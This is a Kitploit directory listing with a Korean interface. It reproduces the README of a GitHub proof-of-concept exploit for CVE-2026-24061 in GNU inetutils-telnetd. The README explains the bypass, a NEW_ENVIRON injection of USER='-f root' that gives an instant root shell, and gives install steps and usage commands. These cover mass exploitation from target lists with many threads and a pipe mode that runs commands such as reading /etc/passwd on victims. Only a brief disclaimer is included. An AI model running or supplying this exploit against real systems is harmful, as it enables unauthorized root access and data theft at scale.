Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24061-PoC-Exploit — Remote authentication bypass exploit for GNU inetutils-telnetd (CVE-2026-24061) using CRLF injection to gain instant root shell. Supports single/mass exploitation, multi-threading, custom ports, pipe mode, and session keep-alive. | Kitploit
도구/GitHubGitHub/tc4dy/cve-2026-24061-poc-exploit
Vulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access ToolPayload Development
GitHubtc4dy/cve-2026-24061-poc-exploit

CVE-2026-24061-PoC-Exploit

Remote authentication bypass exploit for GNU inetutils-telnetd (CVE-2026-24061) using CRLF injection to gain instant root shell. Supports single/mass exploitation, multi-threading, custom ports, pipe mode, and session keep-alive.

저장소 보기
6152일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
요청한 언어로 콘텐츠를 사용할 수 없습니다. 영어 버전을 표시합니다.

CVE-2026-24061

CVE-2026-24061 - GNU inetutils-telnetd Authentication Bypass Exploit

Python Bash License CVSS

GNU inetutils-telnetd Edition - CRLF Injection to Authentication Bypass & Instant Root Shell

-Overview

This exploit leverages CVE-2026-24061, a critical remote authentication bypass vulnerability in GNU inetutils-telnetd. By injecting a crafted NEW_ENVIRON payload with USER='-f root', it bypasses authentication and grants an instant root shell without any credentials.

Note: The basic_exploit.sh script is a simplified, faster version of exploit.sh; however, exploit.sh is recommended for full functionality.

[>] Key Features

CategoryFeatures
Exploitation✅ Authentication Bypass via CRLF Injection
✅ Instant Root Shell
✅ Custom User Injection (-f admin, -f user)
Scanning✅ Single Target Exploitation
✅ Mass Exploitation from File
✅ Multi-Threading (configurable threads)
✅ Custom Port Support
Advanced✅ Pipe Mode (command execution via stdin)
✅ Session Keep-Alive
✅ Retry Mechanism
✅ Timeout Control
Usability✅ Colored Output (colorama)
✅ Dual Language (Python & Bash)
✅ Verbose/Debug Mode

[V] Vulnerable Versions

ProductVersions
GNU inetutils-telnetd1.9.3 - 2.7
Affected Linux DistributionsDebian, CentOS, Ubuntu and their distributions. (Zorin OS, Linux Mint, Pop!_OS and Elementary OS)
Embedded DevicesNAS, IoT, Routers

[!] Disclaimer: This tool is for authorized security testing and educational purposes only. Unauthorized access is illegal.

Installation

# python vers better btw

# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit

# Python version
pip3 install -r requirements.txt

# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh

[i] Usage Examples

Single Target Exploitation

# Python version
python3 exploit.py -u 192.168.1.100

# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100

Custom Port and User

# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323

# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin

Mass Exploitation (Multi-Target)

# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20

# Bash version
./exploit.sh -l targets.txt -m 20

Pipe Mode (Command Execution)

# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100

# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100

Advanced Options

# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v

# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5

# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive

[-<] Command Line Arguments

ShortLongDescriptionDefault
-u--urlTarget IP addressRequired
-p--portTarget port23
-l--listFile containing target listNone
-m--max-threadsMaximum threads for mass exploitation10
-usr--usernameUsername to injectroot
-t--timeoutSocket timeout (seconds)10
-r--retriesNumber of retry attempts3
-v--verboseEnable debug outputFalse
--keep-aliveKeep session alive after exploitationFalse

Related Exploits

Check out my other exploit repositories:

  • CVE-2026-41940
  • CVE-2026-0073
  • CVE-2026-29000
도구 다운로드